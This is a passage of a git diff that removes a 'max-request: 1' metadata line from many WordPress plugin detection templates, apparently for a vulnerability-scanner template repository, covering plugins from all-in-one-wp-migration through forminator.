a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: 